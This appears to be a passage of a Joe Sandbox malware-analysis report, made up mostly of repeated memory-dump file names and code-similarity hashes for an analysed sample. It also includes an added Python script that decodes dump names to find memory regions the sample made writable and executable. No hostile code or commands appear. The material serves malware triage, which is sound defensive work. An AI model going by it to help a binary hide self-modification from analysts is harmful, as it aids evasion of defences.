• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_file.jbxd
Similarity
• API ID:
• String ID: m0{-
• API String ID: 0-1165486362
• Opcode ID: 1b1a53a2d4f163320a4163ec320bf2148236849dce4ccc2914952ad072e64422
• Instruction ID: cc144f3393eb2a9badabcc9dd494d88ed69af9e4bc03ddd237b7b7f2964b71e5
• Opcode Fuzzy Hash: 1b1a53a2d4f163320a4163ec320bf2148236849dce4ccc2914952ad072e64422
• Instruction Fuzzy Hash: EB5107F3F091005BF7046D3DDD8576AB6D7DBC5324F2B863DDA849B788E93988064251
Memory Dump Source
• Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b94dbbf29ea890e7e936ce1ae0d841cef9b0c6ee275bb9595fae4c1e72252b53
• Instruction ID: 7e3e6c678526e80b6534d1b8e75844aa53c9b4d5151b0317810096239dd66187
• Opcode Fuzzy Hash: b94dbbf29ea890e7e936ce1ae0d841cef9b0c6ee275bb9595fae4c1e72252b53
• Instruction Fuzzy Hash: E2323236608611CFC725DF28E89066AB3E6FBCA325F1A897DD58987351D731E881CB42
Memory Dump Source
• Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c3d0613cad7b07f43e7f17b605332ffb618e2260b6ba873c354ae63f412ccab4
• Instruction ID: 6847f32106211914037584b67ecb130e955350b11da3046d92266ed30afe5cdb
• Opcode Fuzzy Hash: c3d0613cad7b07f43e7f17b605332ffb618e2260b6ba873c354ae63f412ccab4
• Instruction Fuzzy Hash: 86420A719087118BC726DF18D8C02BBB3E2FFC4314F2A8A2DE99597285DB35E955C782
Memory Dump Source
• Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cdc034857f001173e751e14c20f0ae0226e86518834a73485aa563daed0b4128
• Instruction ID: 69c95539f5096e5ee753fa21202c7bd67d13038a0b01fa5d38b116b3f9208e9f
• Opcode Fuzzy Hash: cdc034857f001173e751e14c20f0ae0226e86518834a73485aa563daed0b4128
• Instruction Fuzzy Hash: 39627AB0508F818ED3368B3C8859796BFD55B2A324F084A9DE4FE8B3D2C7796105C766
Memory Dump Source
• Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a94b5d5d384f99964cef482f966b2e75f7a296603b6b031c7182d52268d7e3c5
• Instruction ID: c307e54aa97176a9970173b44c7af1e14f86168b39ce97d76f9c2fcab4b9279f
• Opcode Fuzzy Hash: a94b5d5d384f99964cef482f966b2e75f7a296603b6b031c7182d52268d7e3c5
• Instruction Fuzzy Hash: DE52F1F0A0CB888FE736CB24C4C83A7BBE1AB95314F154D2DD5E646B82C379A985C751
Memory Dump Source
• Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c7ab4e601c5b718efb881a41d409417d773762b70187185115847c21140f3518
• Instruction ID: a1433c8097ea1617835203940a026cb2ef77c52a904b4a99a00fe4cbffe8eed5
• Opcode Fuzzy Hash: c7ab4e601c5b718efb881a41d409417d773762b70187185115847c21140f3518
• Instruction Fuzzy Hash: 8952BF315083459FCB16CF19C0D06AABBE1BF88314F19CA6DF89A5B351D778EA49CB81
Memory Dump Source
• Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5273651767dc3a3586776ce4669e098c0e02ffcdbe4263fb9b5df1bc58f8dd0d
• Instruction ID: 3dbc56df380053218be12ec2249595b50565d6dc1666c187638ec37073c2d545
• Opcode Fuzzy Hash: 5273651767dc3a3586776ce4669e098c0e02ffcdbe4263fb9b5df1bc58f8dd0d
• Instruction Fuzzy Hash: EE420271A14B108FC36ACF29C5C0566BBF1BB45710B608A2ED69787F90D736F985CB10
Memory Dump Source
• Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0bc1e0c7ea71c292e58c5f9feb926ebf1add1ccb104fd148e8dc246497c23bd2
• Instruction ID: ec1efcab854db6fadf703ef4e9505795e24830231fd7cbd52ffd7d7c2ab7215c
• Opcode Fuzzy Hash: 0bc1e0c7ea71c292e58c5f9feb926ebf1add1ccb104fd148e8dc246497c23bd2
• Instruction Fuzzy Hash: 1D020132618611CFC729CF28D89065AB7E2FFCA325F1A897DD98987351D734E845CB82
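The .sdmp identifiers listed in these entries carry, for each dumped region of the 0x330000 image, a base address plus two fields whose values (00000004, 00000040, 00000080 and 01000000) match the MEMORY_BASIC_INFORMATION Protect and Type constants from winnt.h (PAGE_READWRITE, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY, MEM_IMAGE). The following Python is an added example and is not part of the Joe Sandbox report or its tooling: it parses the identifiers that appear on this page and lists the image regions that were dumped with a writable-and-executable protection, which is the condition behind the "changes PE section rights" detection in the overview. The field layout it relies on (fifth field = Protect, seventh field = Type) is an assumption inferred from the values on this page, not from Joe Sandbox documentation; the other fields are kept undecoded.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# MEMORY_BASIC_INFORMATION.Protect constants (winnt.h)
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
# MEMORY_BASIC_INFORMATION.Type constants (winnt.h)
MEM_TYPE = {
    0x01000000: "MEM_IMAGE",
    0x00040000: "MEM_MAPPED",
    0x00020000: "MEM_PRIVATE",
}

# ASSUMED layout of a Joe Sandbox .sdmp name: eight dot-separated fields.
# Only the address (field 4), protect (field 5) and type (field 7) are
# decoded; fields 1, 2, 3, 6 and 8 are kept raw because this page does not
# document their meaning.
DUMP_RE = re.compile(
    r"^(?P<f1>[0-9a-f]{8})\.(?P<f2>[0-9a-f]{8})\.(?P<f3>\d+)\."
    r"(?P<addr>[0-9a-f]{16})\.(?P<prot>[0-9a-f]{8})\.(?P<f6>[0-9a-f]{8})\."
    r"(?P<type>[0-9a-f]{8})\.(?P<f8>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    address: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect, f"0x{self.protect:08x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:08x}")

    @property
    def writable_executable(self) -> bool:
        # The two page protections that are writable and executable at once.
        return self.protect in (0x40, 0x80)


def parse_dump_name(name: str) -> DumpRegion:
    """Decode one .sdmp identifier; raise ValueError on anything else."""
    m = DUMP_RE.match(name)
    if m is None:
        raise ValueError(f"not a recognised .sdmp identifier: {name}")
    return DumpRegion(
        name=name,
        address=int(m["addr"], 16),
        protect=int(m["prot"], 16),
        mem_type=int(m["type"], 16),
    )


def writable_executable_image_regions(names: Iterable[str]) -> List[DumpRegion]:
    """MEM_IMAGE regions dumped with a W+X protection, lowest address first.

    The loader maps image sections copy-on-write, so PAGE_EXECUTE_READWRITE
    on a MEM_IMAGE page means the process either called VirtualProtect on it
    or wrote to a PAGE_EXECUTE_WRITECOPY page; either way the binary changed
    its own section rights or contents at run time.
    """
    regions = [parse_dump_name(n) for n in names]
    hits = [r for r in regions if r.mem_type == 0x01000000 and r.writable_executable]
    return sorted(hits, key=lambda r: r.address)


# The thirteen identifiers this page lists for the image at offset 0x330000.
REPORT_DUMPS = [
    "00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp",
]

if __name__ == "__main__":
    for r in writable_executable_image_regions(REPORT_DUMPS):
        print(f"{r.address:#010x}  {r.protect_name:<24} {r.type_name}")
```

Run as a script it prints the eleven W+X regions of this image (0x331000 through 0x7C2000) and leaves out the two PAGE_READWRITE dumps at 0x330000 and 0x386000. When triaging an unpacker, the 0x40 regions are the ones to diff against the on-disk PE sections: they hold whatever the sample wrote into its own image after the loader mapped it.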
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 83dee1fbe1013a8a8441878bdd26226d5665aeb9c7a8c662cc4b64c2e80a94fd
                                                                              • Instruction ID: c27753c8568ba192b5762b323106ef41fefd4b2a7ed9ce29745adb33197872c5
                                                                              • Opcode Fuzzy Hash: 83dee1fbe1013a8a8441878bdd26226d5665aeb9c7a8c662cc4b64c2e80a94fd
                                                                              • Instruction Fuzzy Hash: 47020132618211CFC719DF38D89066AB7E6EFCA324F1A897DD48987291E734D945CB82
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 39b61faf4e7e6893abde7c42b248dd8604cf6245b72464c245c7f3b6eca7ef63
                                                                              • Instruction ID: 351d4622f9718ece5d9232b29e796208ae7cb19d008463f88527c846cef2efa3
                                                                              • Opcode Fuzzy Hash: 39b61faf4e7e6893abde7c42b248dd8604cf6245b72464c245c7f3b6eca7ef63
                                                                              • Instruction Fuzzy Hash: E6E168712083419FD722CF29C881A6BBBE1EFA9300F44882DF5D587752E775E948CB92
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 75f7cb157b82409d0658a4e04ec0988c1ab065c5e3fd1bd339d886bc9845f84c
                                                                              • Instruction ID: f3457af9ed7b2e3c2d50989973fff6e7eace456d08f8ee5cb43a999d04d1441c
                                                                              • Opcode Fuzzy Hash: 75f7cb157b82409d0658a4e04ec0988c1ab065c5e3fd1bd339d886bc9845f84c
                                                                              • Instruction Fuzzy Hash: 539136B1904714DBC726AF18DC9267AB3F4FF95350F09492CF9898B392EB34A944C792
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 10fa47bf28eabf812ff4ba6619bb94a7b1195a6f637381367da4a4e859cd9c55
                                                                              • Instruction ID: dd6200d83ec4864b97441234e9a0ba8b5245d0e737b1b5b47a213d225187c5a8
                                                                              • Opcode Fuzzy Hash: 10fa47bf28eabf812ff4ba6619bb94a7b1195a6f637381367da4a4e859cd9c55
                                                                              • Instruction Fuzzy Hash: E00259B4655B009FC3AACF28C859BA7BBE9FB4A314F10496DE0AEC7350CB752541CB52
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
